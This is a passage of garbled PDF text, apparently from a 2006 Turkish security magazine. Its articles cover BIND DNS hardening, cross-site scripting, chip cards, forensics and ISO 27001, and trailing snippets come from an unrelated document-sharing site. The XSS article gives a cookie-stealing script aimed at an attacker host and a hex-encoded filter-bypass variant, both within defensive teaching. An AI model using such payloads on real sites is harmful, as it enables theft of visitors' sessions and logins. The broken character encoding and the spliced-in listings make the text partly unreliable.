kurtulabilirsiniz. DNS sunucunuz için gereksinimlere göre çift yönlü veya tek yönlü olarak 53 Udp ve 53 Tcp portlar na izin vermeniz yeterli olacakt r. K s tlanm fl bölge aktarmalar (Restrict zone transfers): Güvenlik aflamalar ndan en önemlilerinden biridir. Birçok sistemde aç k unutuldu u için büyük sorunlara neden olmaktad r. BIND üzerindeki afla daki komutlar ile kapat labilir. options { allow-transfer { ; }; }; Veya belirli bir bölge için; type master;

14 BSAPKA SAYI2 4/21/06 7:08 PM Page 15 Erkan fien ni zone nebulabilisim.com { file db.nebulabilisim.com ; allow-transfer { ; }; }; * TSIG (Transaction Signatures) ile kimlik do rulamas yap lm fl bölge aktarmalar : fiifrelenmifl kimlik do rulamas ile bölge aktarmalar n n yap lmas için kullan labilir. Detayl bilgileri ve uygulama örneklerini BIND dokümantasyonundan bulunabilir. * K s tlanm fl dinamik güncellefltirmeler: Dinamik güncellefltirmeleri kimlerin yapabilece ini belirleyerek sistemi koruyabilirsiniz. Ancak burada e er IP adres k s tlamalar kullanacaksan z IP adreslerinin kolayl kla aldat c olarak kullan labildi ini unutmay n. Ayr nt l bilgiyi BIND dokümantasyonundan bulunabilir. zone nebulabilisim.com { type master; file db.nebulabilisim.com ; update-policy { grant allowed-www-updater self A; }; }; Veri zehirlenmesinden korunma (Cache-Poisoning): DNS sunucunuz sorgulara iki flekilde cevap verebilir; Tekrarlanan sorgular(recursive queries) Tekrarlanmayan sorgular (non-recursive queries) Varsay lan olarak birçok dns sunucusu hangi kaynaktan geldi ine bakmaks z n tekrarlanan sorgulara cevap verecek flekilde yap land r lm flt r. Bu sorgulara verilen cevaplar kullan larak DoS veya man-in-the-middle (ortadaki adam) sald r lar yap labilmektedir. Bunlar engellemek için; E er yapabiliyorsan z tekrarlanan sorgular kapatabilirsiniz. options { recursion no; }; Hangi adreslerden hangi tip sorgular n yap labilece ini belirleyebilirsiniz. Tekrarlanan sorgular n hangi adreslerden gelebilece ini belirleyebilirsiniz. view internalview { match-clients { internal; }; recursion yes; }; view externalview { match-clients { any; }; recursion no; }; Yap flkan kay tlar kapatabilirsiniz. options {... fetch-glue no;... }; BIND DNS sunucusunu k s tl kullan c haklar ile çal flt rma: BIND DNS sistemlere genellikle yönetici (Root) kullan c haklar ile kurulur ve ço unlukla bu flekilde b rak l r. Bu ço umuzun yapt en basit hatalardan biri olmakla birlikte en önemli ve tehlikelilerinden biridir. Unix tabanl sistemlerde hemen hemen hiçbir uygulaman n servis olarak yönetici yetkisine ihtiyac yoktur, bu nedenle BIND DNS sunucusu mutlaka yönetici d fl nda bir kullan c hesab ile çal flt r lmal d r. Dosya ve dizin haklar n n iyi ayarlanmas : Yukar da belirtti imiz gibi BIND sunucusunu farkl bir kullan c ile çal flt rd m zda da sistem tam olarak koruma alt na al nm fl olmaz. E er bir sald rgan DNS sunucunuza eriflim sa larsa ve dosyalar n z n sahibi named`i çal flt ran kullan c ise, hala pek çok zarar verebilir. Sistemin kesintisiz çal flmas n için ana dns sunucunuzda BIND kullan c s n n di er dizin ve dosyalara eriflme hakk oldukça k s tl olmal d r. DNS sunucusunu chroot() jail ortam nda çal flt rma: Yukar daki yöntemlerin d fl nda bir sald rgan n neden olabilece i zarar named i chroot-ed bir ortamda çal flt rarak daha da azaltabilirsiniz. Unix chroot(2) sistem ça r s bir ifllemin ana dizinini, ifllemin dosya-sistemi hiyerarflisinde o dizin d fl ndaki dosyalara eriflimini kapatacak flekilde, de ifltirir. Named i çal flt rmak için gerekli olan önemli dosyalar (ve sanal olarak tüm programlar) bu dizinlerde bulundu undan baz ayarlamalar yapmak gerekmektedir. Bu sistemin ayarlar ve uygulamas n Chroot-BIND HOWTO doküman ndan bulabilirsiniz. Dokümanda BIND` chroot ortamda çal flt rma ayarlar ad m ad m detayl olarak anlat l yor. Yukar da verdi imiz birçok örnek ve bilgiler BIND n son sürümü için geçerlidir. Ancak baz bilgi ve komutlar, biz yaz m z haz rlarken de iflmifl veya güncellenmifl olabilir. Bu nedenle güncel bilgi ve sürümleri adresinden kontrol etmenizi tavsiye ediyoruz. Unutmay n sistemlerin istikrarl ve sürekli hizmet verebilmesi için iyi ayarlanm fl ve takip edilebilen sistemler olmalar önemlidir. BEYAZfiAPKA15

15 BSAPKA SAYI2 4/21/06 7:08 PM Page 16 Uzaktan Kod Çal flt rma Oktay KILIÇ ni 16 BEYAZfiAPKA nternet siteleri günümüzde hiç olmad kadar karmafl k yap dalar. Ço u web sayfas, ziyaretçilerle etkileflimi artt rmak için dinamik ö eler içeriyor. Etkileflim kullan c lardan veri toplamak yöntemiyle yap ld için, kullan c lardan verilerin güvenli biçimde al nmas ve saklanmas gerekmektedir. Aksi takdirde web sayfas, günümüzün en popüler güvenlik aç klar terimlerinden biri olan Cross Site Scripting (Uzaktan Kod Çal flt rma) denilen sald r ya maruz kal nabilir. Bu say daki yaz mda Uzaktan Kod Çal flt rma n n ne oldu unu, bu yöntemin iflleyiflini örneklerle anlat p, hangi yöntemlerle engellenebilece inden bahsedece im. Cross Site Scripting, k sa ad yla XSS, web sayfas n n ziyaretçiden veri toplayan sayfalar na özel bir durumdur. Forum, ziyaretçi defteri, web mail uygulamas, RSS feed sistemi gibi uygulamalar XSS in en yayg n oldu u sistemlerdir. Ziyaretçi, önceden kötü niyetli kiflinin XSS aç ndan yararlanarak oluflturdu u bir link (ba lant ) e t klayarak ya da gönderdi i bir mesaj görüntüleyerek kurban konumuna geçebilir. Kötü niyetli kifli internet sitesinde anl k olarak depolanan oturum bilgilerini ya da ziyaretçinin bilgisayar nda depolanan cookie denilen dosyalardaki bilgileri önceden kendisinin haz rlad bir yere gönderttirebilir ya da daha tehlikeli olarak ziyaretçinin kulland internet gezgininin aç ndan yararlan p sistemine zarar verebilir. Uzaktan Kod Çal flt rma n n ne oldu unu daha iyi anlamak için basit bir ziyaretçi defteri uygulamas n inceleyelim: Elimizde Gönder tufluna t kland nda mesaj k sm içindeki bilgileri bir mesajlar.txt dosyas na yaz p mesaj ayn sayfada en altta görüntüleyen basit bir uygulama olsun. Buradaki mesaj k sm na yaz lan veri kontrol edilmeden direk olarak kaydedildi i için bu uygulama uzaktan kodun çal flt r labilece i bir uygulamad r. Mesaj k sm na örne in flöyle bir kod yaz l rsa: <script> document.location = + document.cookie </script> Yaz lm fl olan mesaj okuyan her ziyaretçinin cookie leri cookie.calarim.com adresindeki cookie okuma koduna gönderilir ve e er bu site üyelik sistemiyle çal flan bir site ise, sitedeki üyelik bilgileri yani kullan c ad ve flifre uzaktaki cookie okuyucu kod arac l yla depolanacakt r. Bu yöntemin bu kadar tehlikeli olmas n n yan nda korunma yöntemleri de flafl lacak kadar basittir. Üstteki uygulamay güvenilir k lmak için sadece mesaj k sm na yaz lan yaz n n asl nda bir yaz olup olmad n kontrol etmek, e er de ilse depolanmas n engellemek yeterlidir. Bu ifllemi de flöyle bir kodla yapabiliriz: <? if(!preg_match( /^[A-Za-z0-9 üüflfiööçç]+$/i,$mesaj)) die(header( Location: defter.php?hata=1 ));?> Bu kod ile mesaj k sm ndaki veriyi depolayan $mesaj de iflkeninin içersindeki karakterlerin birer harf ya da rakam olup olmad klar n kontrol eder, e er de illerse hata mesaj na yönlendirir. Böylece uzaktan kodun çal flt r lmas engellenir. Ayn flekilde PHP nin standart fonksiyonlar ndan biri olan htmlentities() ile de aç k giderilebilir. XSS atak kodu, ayn zamanda direk olarak internet gezgininin adres çubu una da yaz labilir. Birkaç ay öncesine kadar var olan google.com daki 1 )</script> aç direk olarak adres çubu una yaz larak çal flt r labilmektedir. XSS atak kodu, insanlar n da okuyabilece i ASCI- I modunda da yaz labilir, e er uygulamadaki HTML filtreleniyorsa bunu da aflmak için HEX ya da baflka bir çeflit flifrelemeyle de yaz labilir. Örnek olarak %72%69%70%74%3E%61%6C%65%72%74%28%22% 31%22%29%3C%2F%73%63%72%69%70%74%3E kodu önceki aç k ASCII koduyla ayn ifli yapacakt r. Görüldü ü gibi XSS gerçekten önemli bir sald r türü, bununla birlikte korunmak ise dikkatli programc l kla çok basit olabiliyor. Web programc lar n n kod yazarken dikkat etmeleri gerekenleri bafll klar halinde flu flekilde s ralayabiliriz: Formlardan gelen verileri kontrol edip depolamak. Her zaman ama her zaman Web Standartlar na uygun kodlar yazmak. Programlama dillerinin güvenlik için sa lad standart fonksiyonlar kullanmak. Her zaman temiz ve düzenli kod yazmak. Tüm bu programc kaynakl önlemlerin yan nda, sunucudaki güvenlik ayarlar n n da mutlaka yap lmas gereklidir. Bu ayarlar aras nda, dosya ve dizin eriflim izinleri, sunucuda php çal flt r l yorsa exec, shell_exec, passthru, allow-url-fopen gibi fonksiyonlar n çal flt r lmas n n yasaklanmas say labilir. Bir dahaki say da görüflünceye dek kodunuz standart, web uygulamalar n z güvenli olsun. :)

16 BSAPKA SAYI2 4/21/06 7:08 PM Page 17 Çip Kart nedir? Nas l çal fl r? Ahmet Artun aksu M ikroçip içeren plastik bir kartt r. Oldukça güvenli bir bellek alan ve güvenli iflleme özellikleri mevcuttur. Mikroçip, kart n ön yüzünde alt n ya da gümüfl renkli kontak yüzeyin alt ndad r. Çip kartlara, ICC, mikroifllemci kart, bellek kart, kontaktl /kontakts z kart veya ak ll kart adlar da verilmektedir. En yayg n kullan m sayesinde banka kart ya da kredi kart olarak banka müflterilerine verilmektedir. Çip kart, kart sahibinin cebine koydu umuz bir bilgisayard r. Bu bilgisayar n bir ifllemcisi, ROM u, RAM, EEP- ROM u, vs. vard r. S ras yla inceleyelim; RSA Crypto Engine; büyük say larla hesaplama ifllemleri yapmak için kullan lan matematik ifllemcidir. Dual Key xes Module and Elliptic Curve Accelerator; Triple DES/AES flifreleme ve deflifreleme ifllemleri yapmak için kullan lan donan m modülüdür. Secure Memories; ROM, RAM ve EEPROM içerir. ROM da kod ve veriler flifrelenmifl olarak saklan r. RAM da ifllem gören veriler flifrelenmifl olarak saklan r. EEPROM da veriler flifrelenmifl veya aç k olarak saklan r. CPU; Merkezi ifllemci ünitesidir. Memory Management Unit; CPU nun kullanabilece i bellek alan n artt rmak için kullan l r. tan larken, cans z olanlar PKI türü yöntemlerle tan maya çal fl r. Canl muhataplar tan man n en yayg n kullan lan yöntemi PIN ile tan lamad r. Örnek; K sa bir zaman içerisinde Türkiye de bafllayacak CHIP&PIN uygulamas d r. Bu sayede kredi kart kullan c lar al flverifllerde PIN lerini güvenli terminallere girerek, kendilerini çip kartlar na (bazen de banka ana sistemlerine) tan tacaklard r. Üye iflyerleri (terminal) gerçek kart kullan m n s nayabilecekler, çipten al nan bilgi ile göz ile elde edilen bilgiyi karfl laflt - rarak sahtecili i önleyeceklerdir. Sunucuya gelen iste in gerçek bir kredi kart ndan gelip gelmedi i anlafl labilecektir. Kredi kart da do ru sunucu ile iletiflime geçti inden emin olacakt r. Tüm bu güvenlik kontrollerinin ard ndan ifllem gerçeklefltirilecektir. Bu ifllemlerin bir k sm gerçek zamanda ana sunuculara eriflerek gerçeklefltirilecektir. Bir k sm ise çipin risk de erlendirmesi akabinde hiçbir yer ile ba lant kurmadan gerçeklefltirilebilecektir. Çip kartlar n kullan m n n sürekli artmas n n sebebi yukar - da k saca bahsetti imiz güvenlik özellikleri, kapasite art - fl sa lamalar, datay alma, iflleme ve gönderme özellikleridir. Bu özellikleri gören bankac l k kart sistemi firmalar EMV ad verilen bir standard tan mlad lar. EMV yi gelecek yaz lar m zda sayfam z el verdi i ölçüde inceleyece- iz. ni Memory Encryption Decryption; CPU ya giden ve gelen verilerin flifreleme ifllemlerini yapar. Interrupt Module; Zamanlama, veri al fl, sald r, vs.. tipli iç ve d fl kesmelere h zla müdahale edilmesini sa lar. Random Number Generator; Rastgele say üretecidir. Universal Asynchronous Receiver Transmitter; Verinin d fl dünyaya iletilmesi ve d flar dan al nmas n sa lar. Timers; Zamanlama ölçümlerini sa lar. Current Scrambling Engine; Elektrik ak m kullan m n kar flt r r. Bozar. Sald r lar engeller. Active Shield; Çipe fiziksel bir sald r oldu unu anlar. Sald r lara karfl uyar c d r. Phased Locked Loop; D flar dan al nan frekans art r r. Sald r lar engeller. Çip kartlar, enerjisini, terminale fiziksel temasla, manyetik alan veya elektrik alan yolu ile temin ederler. Kendi pilini tafl yan, fl k enerjisi ile beslenen çip kartlar da mevcuttur. Çip, sahibini, iletiflimde oldu u terminali, ulaflt sunucuyu tan maya çal fl r. Ayn zamanda iletiflim terminali ve sunucu da çipi tan maya çal fl r. Çip, canl muhataplar n flifre sorarak, biyometrik özelliklerine bakarak, vs.. yöntemle Çip kartlar n kullan m alanlar hayalimiz ile s n rl d r. Finansal uygulamalar sayesinde para, kredi, telefon, sadakat, ödemeli televizyon, tele-al flverifl, tele-bankac l k kart olarak; Elektronik para uygulamalar sayesinde düflük de erli ödeme arac fleklinde flehir içi ulafl m, hemfleri, otopark, flehir merkezi girifl, otoyol kart olarak; Fiziksel güvenlik uygulamalar sayesinde bina, kat, daire ve site girifllerinde tan ma kart olarak; Lojik güvenlik uygulamalar sayesinde tan lama, veri ve veri iflleme fonksiyonlar yetkilendirme, hassas bilgi yedekleme/tafl ma kart olarak; Sahiplik ve s nama uygulamalar sayesinde dijital imza kart olarak; Sa l k ve sigortac l k uygulamalar ile hasta takibi, ilaç takibi kart olarak; Ulusal güvenlik uygulamalar ile pasaport, nüfus cüzdan, seçmen, ehliyet, vize, turist takip kart olarak; Üretim, perakende, stok, sat fl uygulamalar ile mamul, yar mamul, son ürün takip etiketleri olarak; Yaz l m lisans uygulamalar nda lisans kontrol kart olarak; Araç kontrol uygulamalar nda anahtar kart olarak kullan - labilir. Çip kartlar n kullan labilece i bir sektör, bir uygulama akl n za geliyor mu? Eminim çok de iflik fikirler üreteceksiniz. Bu fikirlerinizi benimle paylafl rsan z çok sevinirim. Bir sonraki say m zda görüflmek üzere... BEYAZfiAPKA17

17 BSAPKA SAYI2 4/21/06 7:08 PM Page 18 Adli Biliflim ve Biliflim Suçlar -1 (Digital Forensics) Mehmet DALYANDA A ni 18 BEYAZfiAPKA dli bilimler (forensic sciences), suçlar n ifllenifl çeflidi ve biçimleri fazlalafl p, karmafl klaflt kça daha da fazla önem kazanmaktad r. Bu da profesyonel olarak ele al nmas ve uygulanmas n gerektiren, çok farkl uzmanl k alanlar n n ortaya ç kmas sonucunu do urmaktad r. 700 binin üzerinde say ya sahip böcek türünü incelemeye çal flan entomoloji uzmanlar, zirai olaylar için kullan labilece i gibi cesedin ne zaman öldü ü ve çevre flartlar konusunda da bilgi üzere kriminal olaylar için de kullan labilir. Zira bir insan öldükten hemen sonra, ceset korunmas z ise ortalama 10 dakika içinde üzerinde çeflitli canl lar dolaflmaya ve iz b rakmaya bafllar. Say s z miktarda fazla suçu ile karfl laflt m z günümüzde, yarg ve güvenlik makamlar na resmi bilgi ve kan t olacak flekilde, sistemleri üzerinde inceleme yap lmas konusu gündeme gelmektedir. Adli konusunda sadece teknik uzmanlar n de il, ayn zamanda yarg ve güvenlik makamlar n n da, elektronik sistemler ve kanunlar konusunda bilgi sahibi olmas gerekmektedir. Her temas bir iz b rak r prensibi, 1910 y l Fransa da ilk kriminal laboratuar n n kurucusu Prof. Edmund Locard a aittir. Bu prensip do rultusunda, adli incelemesi yap lacak tüm cihazlar da, her bir olay için mutlaka delil niteli i tafl yan ya da olay ayd nlatmaya yönelik izleri de üzerinde bulundurabilece i düflüncesi ile oldukça hassas bir biçimde incelemeye tabi tutulmal d r. Metodoloji Elektronik iz ya da kay tlar, silinme, bozulma ya da de ifltirilme gibi olgulara karfl oldukça hassast rlar. Olay n do as na ayk r bir flekilde ve herhangi bir metodoloji izlenmeksizin, cihazlar üzerinde çal flmak, kan tlar n ilk hallerinin bozulmas, hatta yok edilmesi ile neticelenebilir. Bilimsel inceleme esaslar na dayal adli analizleri, adalet önünde önemli bir kaynak oluflturaca için bir metodoloji takip etmek yerinde olacakt r. Amerika Adalet Bakanl (http://www.usdoj.gov), olay yeri ve sonras inceleme prosedürü olarak 4 ana bafll k belirlemifltir: Delil toplama, inceleme, analiz ve raporlama. Delil toplama safhas, yanl fl ya da hatal uygulamalar sonucu, elektronik delillerin ortadan kald r lmas na da yol açabilece i için büyük önem tafl r. Örne in, adli inceleme yap lacak cihazlar, çal fl yor ise kapat lmamal, kapal ise aç lmamal d r. nceleme, gizlenmifl ya da kar flt r lm fl tüm delillerin ortaya ç kart larak dokümantasyona tabi tutulmas d r. Örne in, steganografik verilerin belirlenmesi ve analiz için ayr lmas bu safhada yap l r. Analiz, ortaya ç kar lan tüm elektronik veriler içinden delillerin ay klanmas ve detayl incelenmesi safhas d r. Raporlama, iyi bir adli uzman n n üzerinde dikkatle durmas gereken safhad r. Yarg makamlar n n, yaz lan rapor do rultusunda karar verecekleri unutulmamal d r. Adli makamlara iletti im birçok raporda, raporun hemen sonuç k sm na bak ld na da flahit oldu umu rahatl kla söyleyebilirim. fiekil_1 Fiziksel disk wiping ifllemi Teknik nceleme Biliflim suçlar n n incelenmesi kapsam nda birçok teknik donan m ve/veya yaz l m üzerinde inceleme yap lmas gerekebilir. Bunlar daha sonra detayland rmak üzere flimdilik s ralayal m: Özel donan mlar (Ak ll kartlar, kredi kart kopyalama cihazlar, dongle, biyometrik cihazlar, pda, bellek kartlar ) Disk sürücüleri, sistem aç l fl (boot loader/booting) Dosya sistemi, swap, raw veri kopyalanmas Sistem yama durumu, kullan c ve gruplar, sistem policy, OS bafllang ç parametreleri, otomatik yüklenen uygulamalar, zamanlanm fl görevler Uptime, uptime history, clipboard, dll listeleri, prosess ve thread ler, sistem servisleri ve login ler nternet taray c lar n n analizi (geçici dosyalar, cookie, history, proxy, sertifikalar, add-ons) Kay t dosyalar (sistem ve uygulama loglar ) Veri kurtarma, flifrelenmifl veriler, parola ile korunan veriler, steganografik veriler, video ve resimler nternet eriflimi, a trafi i analizi, a adaptörlerinin durumu, firewall, modem, telsiz cihazlar Keylogger/screenlogger analizi, flifrelerin analizi E-posta, P2P / IM uygulamalar n n analizi Rootkit, trojan, backdoor, virus, worm, bot aranmas Sonuç Adli in ne oldu u ve önemini k saca anlatmaya çal flt m z bu yaz dizisinin devam nda, yukar da listeledi imiz konular üzerinde nas l teknik sistem analizleri yap lmas gerekti inden bahsedece iz. Hack edilmifl sistemler ya da tehdit/hakaret içerikli e-postalar n gönderilmesi gibi popüler suçlar ndan örneklerle yola ç karak, ad m ad m incelemenin nas l yap laca n gösterece iz. Ayr ca kullan labilecek araçlar, yöntem ve prosedürlerden de bahsetmekle birlikte, yeni Türk Ceza Kanunu ve uluslararas kanunlarda, suçlar n n yeri konusuna da de inece iz.

18 BSAPKA SAYI2 4/21/06 7:08 PM Page 19 Bilgi Güvenli i Yönetim Sisteminin (BGYS) Kurumlara Uygulanmas ve ISO Murat LOSTAR - 1 B ni ilgi nin kurumlarda yönetim sistemi olarak kurulmas n n ve iflletilmesinin yeni bir kavram olmamas na karfl l k, bu sistemin sertifikalanmas na, ülkemizde ancak 2005 te bafllanm flt r. Kurumunuz, ISO Sertifikas il, rekabet avantaj kadar, yönetilen bilgi sayesinde farkl ticari avantajlar,bilginin korunmas na ba l parasal kazançlar sa layacakt r. Bu yaz da, numaralar birçok kez de iflen standartlara aç kl k getirilecek ve bir kurumda uygulanmas s ras nda izlenmesi gereken aflamalar özetlenecektir. ngiltere de Ocak 1993 te bir endüstri çal flma grubu olarak toplanan ekibin yazmaya bafllad standart, günümüzde, ABD den Japonya ya tüm dünyada yayg n olarak Bilgi Güvenli i Yönetim Sistemi kurmak ve belgelendirmek için kullan lmaktad r. ISO ailesinin farkl standartlar ve numaralar afla daki tabloda yer almaktad r. ISO27001 (Eski no: TS , BS7799-2) Bilgi Güvenli i Yönetim Sistemleri - fiartlar (Belgelendirme) ISO27002 (TS17799, ISO17799, BS7799) Bilgi Güvenli i Yönetimi çin Uygulama Prensipleri ISO27003 (BS7799-3) BGYS risk analiz yönetim yönergesi ISO27004 BGYS metrik ve ölçümler ISO27005 GBYS uygulama yönergeleri Kurumsal bilgi yönetim sistemi (BGYS) kurmak için haz rlanan proje plan afla daki ad mlardan oluflmaktad r: 1. Standard n al nmas : Standartlar adresinden ngilizce ve adresinden Türkçe olarak edinilebilir. Yap lmas düflünülen BGYS çal flmas ile standard n uyumu kontrol edilmelidir. 2. Ön ekibin e itimi: BGYS kurma yöntemlerinin de yer ald bir e itim program, kurum içindeki BGYS fiampiyonu ve ön ekip ilk haz rl n tamamlar. E itim program, fark ndal k, uygulama ve bafl tetkikçi e itimlerini içerebilir. Ekip içinde en az bir kiflinin bafl tetkikçi e itimini alm fl olmas, yarat lan sistemin belgelendirme denetimine haz rl kolaylaflt r r. 3. Ekip ve Stratejinin kesinlefltirilmesi: lk ifl, BGYS ekibinin kurulmas ve üst yönetim bilgi/deste i ile hedefin ortaya konmas d r. Ekip, BGYS grubu içinde gerekli kaynaklar n aktar lmas ve görevlendirme için üst yönetim temsilcili ini de yapacak olan BGYS Sponsoru, projenin yönetimini yapacak olan BGYS fiampiyonu ve gerekli süreç sahiplerinden oluflabilir. 4. Kapsam n belirlenmesi: BGYS nin hangi s n rlar içinde uygulanaca kapsam doküman içinde belirlenir. Kapsam seçenekleri, tüm kurum, tek bir süreç ya da bir departman n tüm süreçleri olabilir. Kapsam belirlenirken. flin karakteristik özellikleri, organizasyon, yerleflim, varl klar ve teknoloji göz önüne al nmal, kapsam d fl nda b rak lan her fley ayr nt lar ve gerekçeleri ile belirtilmelidir. 5. Dan flmanl k karar n n verilmesi: Kapsam belirlendikten sonra, kendi BGYS nizi kurarken d flar dan alabilece iniz destek seçeneklerini de erlendirebilirsiniz. Dan flmanl n amac yaln zca BGYS süresince ekibi yönlendirme ve do ru sonuçlar üretme olmal d r. Sizin ad n za bir baflka kurum taraf ndan çal flan bir BGYS yarat lamaz. 6. Politika Beyannamesinin yaz lmas ve onaylanmas : Genellikle yar m ile iki sayfa aras tutan güvenlik politika beyannamesi, tüm flirket çal flanlar na ve flirketle iliflki içindeki kiflilere bilgilerin ile ilgili hedeflerin gösterilmesi amac yla yaz l r; kurumun bilgi anayasas gibi kabul edilir. Üst yönetim taraf ndan da onaylanmas gereken bilgi beyannamesinin, kolay anlafl labilir, uygulanabilir, kolay gerçeklefltirilebilir ve ifl hedeflerini karfl layan yap da olmas önemlidir. 7. Bilgi varl klar n n belirlenmesi: Bilgi ni sa layabilmek için, korunmas gereken bilgi varl klar n n listelenmesi, sahiplerinin belirlenmesi gereklidir. Süreçler izlenerek, ilgili bilgiler ve kaynaklar ç kar l r. Böylece de bilgi varl klar n n eksiksiz listelenmesi sa lanabilir. Bilgi kaynaklar kâ t üzerine bas lm fl ya da yaz lm fl, elektronik ortamda saklanmakta, posta ya da elektronik ortamlarla aktar lmakta, kurumsal videolarda gösterilmekte ya da söylefliler s ras nda sözlü olarak aktar lmakta olabilir. 8. Varl klar n de erlendirilmesi: Her varl k ayn de erde de ildir. Dolay s yla, her varl n korunmas için eflit çaba harcanmas anlaml olmaz. Bu yüzden sahiplerinin, varl klar önceliklendirmesi gerekir. Bu öncelik s ralamas, varl n Gizlilik, Bütünlük ve Kullan labilirlik özelliklerine göre yap labilir. 9. Risk de erlendirmesi: Her varl n Gizlili ini, Bütünlü ünü ve Kullan labilirli ini (GMK) tehdit eden unsurlar ve bu tehditlere aç k kap sa layan zay f noktalar vard r. Tehditler ve zay f noktalar birleflerek, varl klar n GMK lar için riskleri olufltururlar. Risklerin, do ru, tekrarlanabilir ve kurum gereksinimlerine uygun biçimde de erlendirilmesi, BGYS nin baflar s üzerinde do rudan etkilidir. Do ru risk de erlendirme yönteminin gelifltirilmesi ise, dan flmanl k alanlar n n en önemlilerinden biridir. 10. Risklerin ele al nmas ve kontrol seçimi: Önceki aflamada belirlenen riskler, ya yeterince düflük bulunur ve kabul edilir ya da kabul düzeyine gelmeleri için çeflitli kontroller uygulanarak ortadan kald r l r, azalt l r ve devredilir. Seçilen kontroller için ISO ve ISO (ISO 17799) dan yararlan labilir. 11. Politika ve prosedürlerin yaz lmas : Seçilen kontrollerin nas l kullan laca, BGYS nin nas l çal flaca, haz rlanan dokümanlar içinde belirlenir. Bu dokümanlar politikalar, standartlar, k lavuzlar ve süreçler adlar n al rlar. 12. BGYS dokümantasyonu ve uygulaman n gerçeklefltirilmesi: Dokümantasyon, yönetim kararlar n n kay tlar n BEYAZfiAPKA19

19 BSAPKA SAYI2 4/21/06 7:08 PM Page 20 U içermeli, eylemlerin yönetim kararlar ve politikalar na uygun olmas n sa lamal ve kaydedilen sonuçlar n yeniden üretilebilir olmas na olanak tan mal d r. Önceki maddelerde anlat lanlar n d fl nda uygulanabilirlik beyannamesi haz rlanmal d r. 13. Fark ndal k e itimlerinin verilmesi: Haz rlanan BGYS kâ t üstünde ne kadar baflar l olursa olsun, kurum çal flanlar taraf ndan uygulanmad kça etkili olamaz. Haz rlanan politika, süreç ve di er BGYS dokümanlar, standart tehdit ile zay f noktalar ve çözümlerle birlikte tüm (tam ve yar zamanl ) yöneticiler, çal flanlar, teknik ve teknik olmayan personel, kapsam d fl ama kapsamla iliflkisi olan kifliler (müflteriler ve tedarikçiler vb.) fark ndal k e itimlerine kat lmal d r. Fark ndal k e itimleri web tabanl olabilece i gibi, s n f e itimi biçiminde ya da baflka yöntemlerle yap labilir. 14. Gözden geçirme, denetim ve önlemler: ISO standard nda bulunan PUKÖ (Planla-Uygula-Kontrol Et- Önlem Al) çevrimi içinde yer alan kontrol et, gerçeklefltirilen tüm süreçlerin gözden geçirilmesi Zorunlulu unu gösterir. Bu durumda yap lan, izleme süreçlerinin çal flt r lmas, yani BGYS nin etkinli inin ve planlanan aral klarla risk de erlendirilmesinin gözden geçirilmesi ile üst yönetimini BGYS yi incelemesidir Bulgulara göre kararlaflt r lan önlemlerin al nmas ve sistemin güncellenmesi gerekir. 15. ISO sertifika baflvuru ve al m: Bu aflamaya geldi inizde sahip oldu unuz sistemi belgelendirmek, avantajlara kavuflmak için önemlidir. 1 BU YAZI 19 SAYFANIN FAZLA YAZISIDIR. BU KADAR ATILMASI GEREK YOR

Sisteminiz Artık Daha Güvenli ve Sorunsuz...

Sisteminiz Artık Daha Güvenli ve Sorunsuz... Sisteminiz Artık Daha Güvenli ve Sorunsuz... Asistek Firewall kullanmanın pek çok yararı vardır: Asistek Firewall, tamamen web tabanlı ve esnek yapıya sahip Güvenlik Duvarı servislerini barındırarak çeşitli

Detaylı

System Center Operations Manager 2007 Kurulum,Client Discovery ve Performans İzlemesi

System Center Operations Manager 2007 Kurulum,Client Discovery ve Performans İzlemesi System Center Operations Manager 2007 Kurulum,Client Discovery ve Performans İzlemesi Serhad MAKBULOĞLU MCSE/MCITP/MCT Serhad.makbuloglu@cozumpark.com Ajanda System Center Ürün Ailesine Genel Bakış SCOM

Detaylı

Topluluğun gücü düşündüğünüzden daha yakın IBM Lotusphere Comes to You 2009

Topluluğun gücü düşündüğünüzden daha yakın IBM Lotusphere Comes to You 2009 Topluluğun gücü düşündüğünüzden daha yakın IBM Lotusphere Comes to You 2009 ile e-postalarınız Güvende Özcan Çavuş Bilgi Teknolojisi Uzmanı, Lotus V 1.51P Notes/Domino: E-posta Güvenliğinde Altın Standart

Detaylı

Uygulama Önerisi 1110-2: ç Denetim Yöneticisi- Hiyerarflik liflkiler

Uygulama Önerisi 1110-2: ç Denetim Yöneticisi- Hiyerarflik liflkiler Uygulama Önerileri 59 Uygulama Önerisi 1110-2: ç Denetim Yöneticisi- Hiyerarflik liflkiler Uluslararas ç Denetim Meslekî Uygulama Standartlar ndan Standart 1110 un Yorumu lgili Standart 1110 Kurum çi Ba

Detaylı

Hakkımızda NBN BİLİŞİM HİZMETLERİ

Hakkımızda NBN BİLİŞİM HİZMETLERİ 1 2 Hakkımızda NBN 2015 yılında uzun yılların tecrübesini ses ve network çözümlerinde birleştiren ekip tarafından kurulan bir bilişim şirketidir. Kurulduğu günden bu yana sektörde birçok önemli kablolama,

Detaylı

ENTERPRISE CONTACT CENTER

ENTERPRISE CONTACT CENTER call center ENTERPRISE CONTACT CENTER SAPHIRA ülkemizin uluslararası arenada ekonomik ve teknolojik rekabet gücünü artırıcı niteliklere sahip olmak üzere; İ.Ü. Teknokent yerleşkesi içerisinde, geliştirmelerin

Detaylı

VSG 1200_v2 Kurulum ve Kullanım Kılavuzu

VSG 1200_v2 Kurulum ve Kullanım Kılavuzu VSG 1200_v2 Kurulum ve Kullanım Kılavuzu 1 Kurulum Seçenekleri Aşağıdaki kısım farklı kurulum seçeneklerini tanımlamktadır. Not: Kurulum sırasında kurulum deliklerini kapatmayınız ve VSG nin ön ve arka

Detaylı

Animasyon Tabanl Uygulamalar n Yeri ve Önemi

Animasyon Tabanl Uygulamalar n Yeri ve Önemi Otomasyon Sistemleri E itiminde Animasyon Tabanl Uygulamalar n Yeri ve Önemi Murat Ayaz Kocaeli Üniversitesi Teknik E itim Fakültesi, Elektrik E itimi Koray Erhan Kocaeli Üniversitesi, Teknoloji Fakültesi,

Detaylı

TÜRK YE B L MSEL VE TEKNOLOJ K ARAfiTIRMA KURUMU DESTEK PROGRAMLARI BAfiKANLIKLARI KURULUfi, GÖREV, YETK VE ÇALIfiMA ESASLARINA L fik N YÖNETMEL K (*)

